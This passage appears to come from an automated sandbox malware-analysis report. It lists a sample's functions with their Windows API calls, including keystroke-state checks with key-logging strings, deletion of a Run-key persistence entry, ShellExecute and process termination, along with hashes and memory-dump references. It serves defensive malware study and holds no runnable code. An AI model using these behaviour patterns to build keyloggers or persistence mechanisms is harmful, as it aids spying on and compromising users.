                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Time$FileSystem
                                              • String ID: GetSystemTimePreciseAsFileTime$v%(/
                                              • API String ID: 2086374402-1868180595
                                              • Opcode ID: 36094b6d006a7c5976d2fe62b58f2756bffc72267d66b89a94896d775de98ed0
                                              • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                              • Opcode Fuzzy Hash: 36094b6d006a7c5976d2fe62b58f2756bffc72267d66b89a94896d775de98ed0
                                              • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                              Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: !D@$open
                                              • API String ID: 587946157-1586967515
                                              • Opcode ID: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                              • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                              • Opcode Fuzzy Hash: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                              • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                              Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000012), ref: 0040B6E0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State
                                              • String ID: [CtrlL]$[CtrlR]
                                              • API String ID: 1649606143-2446555240
                                              • Opcode ID: 1d2d80fd5b8c20147d0c6ff4d402c2e3edc42c22dff79285f987829e6048126c
                                              • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                              • Opcode Fuzzy Hash: 1d2d80fd5b8c20147d0c6ff4d402c2e3edc42c22dff79285f987829e6048126c
                                              • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                              Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: ,kG$0kG
                                              • API String ID: 1881088180-2015055088
                                              • Opcode ID: bf6eaf7ad603c651630b5b847c32adb66bdf614d62153d48efbad85f1494e607
                                              • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                              • Opcode Fuzzy Hash: bf6eaf7ad603c651630b5b847c32adb66bdf614d62153d48efbad85f1494e607
                                              • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                              Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,8)[,004752F0,?,pth_unenc), ref: 00413A6C
                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteOpenValue
                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                              • API String ID: 2654517830-1051519024
                                              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                              • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                              • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                              Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ObjectProcessSingleTerminateWait
                                              • String ID: pth_unenc
                                              • API String ID: 1872346434-4028850238
                                              • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                              • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                              • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                              • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                              Function 0044F38A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CommandLine
                                              • String ID: 8(Z
                                              • API String ID: 3253501508-64650106
                                              • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                              • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                              • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                              • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                              Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                              • GetLastError.KERNEL32 ref: 00440D85
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                              • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                              • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                              • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                              Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                              • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastRead
                                              • String ID:
                                              • API String ID: 4100373531-0
                                              • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                              • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                              • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                              • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99